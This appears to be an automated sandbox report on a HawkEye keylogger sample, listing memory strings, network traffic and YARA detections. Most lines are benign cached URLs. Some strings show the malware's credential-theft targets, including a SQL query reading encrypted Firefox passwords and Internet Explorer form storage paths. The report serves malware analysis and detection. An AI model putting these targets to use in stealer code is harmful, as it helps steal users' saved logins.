                Source: bhv8D09.tmp.13.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/19.086.0502.0006/OneDriveSetup.exe
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/19.103.0527.0003/update1.xml?OneDriveUpdate=d580ab8fe35aabd7f368aa
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.124.0621.0006/update1.xml?OneDriveUpdate=285df6c9c501a160c7a24c
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.124.0621.0006/update1.xml?OneDriveUpdate=4a941ab240f8b2c5ca3ca1
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://onecs-live.azureedge.net/api/settings/en-US/xml/settings-tipset?release=rs4
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.c
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookie
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://pki.goog/repository/0
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/BXjlWewXmZ47HeV5NPvUYA--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=28e3747a031f4b2a8498142b7c961529&c=MSN&d=http%3A%2F%2Fwww.msn
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://ssl.gstatic.com/gb/images/i1_1967ca6a.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
                Source: pjavpo.exe, 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatismyipaddress.com/
                Source: pjavpo.exe, 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatismyipaddress.comx&Qqt
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.digicert.com/CPS0
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google-analytics.com/analytics.js
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=993498051.1601450642
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/?gws_rd=ssl
                Source: pjavpo.exe, vbc.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/async/bgasy?ei=gTJ0X7zPLY2f1fAPlo2xoAI&yv=3&async=_fmt:jspb
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/complete/search?q&cp=0&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0&pq
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/complete/search?q&cp=0&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0&ps
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/complete/search?q=c&cp=1&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0&
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/complete/search?q=ch&cp=2&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/complete/search?q=chr&cp=3&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/complete/search?q=chro&cp=4&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/complete/search?q=chrom&cp=5&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuse
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/complete/search?q=chrome&cp=6&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authus
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/favicon.ico
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_92x30dp.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/images/hpp/Chrome_Owned_96x96.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/images/icons/material/system/1x/email_grey600_24dp.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/images/nav_logo299.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/images/phd/px.gif
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/images/searchbox/desktop_searchbox_sprites302_hr.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/application/x-msdownloadC:
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/js/bg/4sIGg4Q0MrxdMwjTwsyJBGUAZbljSmH8-8Fa9_hVOC0.js
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/search
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3k
                Source: vbc.exe, 0000000D.00000003.324135944.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.325490889.000000000221A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.324202827.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.323964619.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.324363269.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.325212298.000000000221A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.324885939.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.324652893.0000000002215000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/searchp/LinkId=255141
                Source: vbc.exe, 0000000D.00000003.325110381.000000000220D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.323407346.000000000222A000.00000004.00000800.00020000.00000000.sdmp, bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQ
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/xjs/_/js/k=xjs.s.en_GB.u8fwEfmm86E.O/ck=xjs.s.hyRG9kR79v8.L.I11.O/am=AAAAAABA
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.google.com/xjs/_/js/k=xjs.s.en_GB.u8fwEfmm86E.O/ck=xjs.s.hyRG9kR79v8.L.I11.O/m=IvlUe
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.ConsentUi.en_GB.wmTUy5P6FUM.es5.O/ck=
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/_/mss/boq-one-google/_/js/k=boq-one-google.OneGoogleWidgetUi.en.bMYZ6MazNlM.
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/ac/cb/cb_cbu_kickin.svg
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/1x/googlelogo_color_92x36dp.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/check_black_24dp.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/keyboard_arrow_down_grey600_24dp.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/kpui/social/fb_32x32.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/kpui/social/twitter_32x32.png
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.og2.en_US.vA2d_upwXfg.O/rt=j/m=def
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.LGkrjG2a9yI.O/rt=j/m=qabr
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.CniBF78B8Ew.L.X.O/m=qcwid/excm=qaaw
                Source: bhv8D09.tmp.13.drString found in binary or memory: https://www.gstatic.com/ui/v1/activityindicator/loading_24.gif
                Source: vbc.exe, 0000000D.00000003.325490889.000000000221A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.325673478.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.326155267.000000000221A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.325833599.0000000002215000.00000004.00000800.00020000.00000000.sdmp, bhv8D09.tmp.13.drString found in binary or memory: https://www.msn.com/
                Source: vbc.exe, 0000000D.00000003.325673478.0000000002215000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com//searchp/LinkId=255141
                Source: vbc.exe, 0000000D.00000003.328802653.00000000027E8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.327613810.00000000027E8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.332890748.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.332406171.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.332307194.00000000009EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/http://www.google.com/ms-appx-web://microsoft.microsoftedge/ms-appx-web://micros
                Source: vbc.exe, 0000000D.00000003.329277879.000000000221A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.328664768.000000000221A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.328857011.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.328998402.000000000221A000.00000004.00000800.00020000.00000000.sdmp, bhv8D09.tmp.13.drString found in binary or memory: https://www.msn.com/spartan/dhp?locale=en-US&market=US&enableregulatorypsm=0&enablecpsm=0&ishostisol
                Source: unknownDNS traffic detected: queries for: 63.155.11.0.in-addr.arpa
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_00B1B07E recv,
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 11 Mar 2022 10:56:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closePermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTX-Frame-Options: SAMEORIGINExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Set-Cookie: __cf_bm=0fu62l9a9_o52ZpSiY3B2Ubbqf8OPYGmRmWYhvH38y0-1646996200-0-AfArknz4ODut5S1R3Wyrv/QQodqXd6I1PPLa+MPUvKGZ6LT0rq7co6gxFQbkOapzHcyoZ6cbSHNSxTJdVa3eLOE=; path=/; expires=Fri, 11-Mar-22 11:26:40 GMT; domain=.whatismyipaddress.com; HttpOnly; SecureServer: cloudflareCF-RAY: 6ea3c3cbc8a66955-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                Source: vbc.exe, 0000000D.00000002.332890748.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.332406171.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.332307194.00000000009EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.msn.com/http://www.google.com/ms-appx-web://microsoft.microsoftedge/ms-appx-web://microsoft.microsoftedge/assets/errorpages/dnserror.html?ErrorStatus=0x800C0005ms-appx-web://microsoft.microsoftedge/assets/errorpages/dnserror.htmlms-appx-web://microsoft.microsoftedge/assets/errorpages/dnserror.html?ErrorStatus=0x800C0005&DNSError=11001ms-appx-web://microsoft.microsoftedge/assets/errorpages/dnserror.html?ErrorStatus=0x800C0005&DNSError=10060https://login.live.com/me.srf?wa=wsignin1.0&wreply=https%3A%2F%2Fwww.microsoft.com&uaid=c5003367-537c-4bc6-f11c-743a85fd800b&partnerId=retailstore2https://login.live.com/me.srfhttps://login.live.com/me.srf?wa=wsignin1.0&wreply=https%3A%2F%2Fwww.microsoft.com&uaid=8dc8b1f5-b8c0-44ac-8df2-c841e5a6aeb1&partnerId=retailstore2https://www.microsoft.com/en-us/welcomeie11/welcomeie11https://www.microsoft.com/store/buy/cartcounthttp://cookies.onetrust.mgr.consensu.org/?name=euconsent&value=&expire=0&isFirstRequest=truehttp://cookies.onetrust.mgr.consensu.org/https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fhttps://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.google.com&gl=GB&pc=s&uxe=4421591 equals www.facebook.com (Facebook)
                Source: vbc.exe, 0000000D.00000002.332890748.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.332406171.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.332307194.00000000009EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.msn.com/http://www.google.com/ms-appx-web://microsoft.microsoftedge/ms-appx-web://microsoft.microsoftedge/assets/errorpages/dnserror.html?ErrorStatus=0x800C0005ms-appx-web://microsoft.microsoftedge/assets/errorpages/dnserror.htmlms-appx-web://microsoft.microsoftedge/assets/errorpages/dnserror.html?ErrorStatus=0x800C0005&DNSError=11001ms-appx-web://microsoft.microsoftedge/assets/errorpages/dnserror.html?ErrorStatus=0x800C0005&DNSError=10060https://login.live.com/me.srf?wa=wsignin1.0&wreply=https%3A%2F%2Fwww.microsoft.com&uaid=c5003367-537c-4bc6-f11c-743a85fd800b&partnerId=retailstore2https://login.live.com/me.srfhttps://login.live.com/me.srf?wa=wsignin1.0&wreply=https%3A%2F%2Fwww.microsoft.com&uaid=8dc8b1f5-b8c0-44ac-8df2-c841e5a6aeb1&partnerId=retailstore2https://www.microsoft.com/en-us/welcomeie11/welcomeie11https://www.microsoft.com/store/buy/cartcounthttp://cookies.onetrust.mgr.consensu.org/?name=euconsent&value=&expire=0&isFirstRequest=truehttp://cookies.onetrust.mgr.consensu.org/https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fhttps://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.google.com&gl=GB&pc=s&uxe=4421591 equals www.yahoo.com (Yahoo)
                Source: pjavpo.exe, 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000000.306589441.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000000.306007276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.332740364.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                Source: pjavpo.exe, 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000000.306589441.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000000.306007276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.332740364.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                Source: bhv8D09.tmp.13.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/beauty|ntpproviders equals www.yahoo.com (Yahoo)
                Source: bhv8D09.tmp.13.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/food|ntpproviders equals www.yahoo.com (Yahoo)
                Source: bhv8D09.tmp.13.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/health|ntpproviders equals www.yahoo.com (Yahoo)
                Source: bhv8D09.tmp.13.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/makers|ntpproviders equals www.yahoo.com (Yahoo)
                Source: bhv8D09.tmp.13.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/movies|ntpproviders equals www.yahoo.com (Yahoo)
                Source: bhv8D09.tmp.13.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/music|ntpproviders equals www.yahoo.com (Yahoo)
                Source: bhv8D09.tmp.13.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/parents|ntpproviders equals www.yahoo.com (Yahoo)
                Source: bhv8D09.tmp.13.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/politics|ntpproviders equals www.yahoo.com (Yahoo)
                Source: bhv8D09.tmp.13.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/style|ntpproviders equals www.yahoo.com (Yahoo)
                Source: bhv8D09.tmp.13.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/tech|ntpproviders equals www.yahoo.com (Yahoo)
                Source: bhv8D09.tmp.13.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/travel|ntpproviders equals www.yahoo.com (Yahoo)
                Source: bhv8D09.tmp.13.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/tv|ntpproviders equals www.yahoo.com (Yahoo)
                Source: bhv8D09.tmp.13.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com|ntpproviders equals www.yahoo.com (Yahoo)
                Source: pjavpo.exe, vbc.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Yara detected HawkEye Keylogger
                Source: Yara matchFile source: 3.2.pjavpo.exe.20e0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4965c92.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.41b460.11.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.415058.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4996408.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4a20000.16.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.415058.10.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20e0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4990000.15.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.41ce65.15.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4a29c0d.17.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.41ce65.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.41ce65.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.380b065.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.3803258.6.raw.unpack, type: UNPACKEDPE
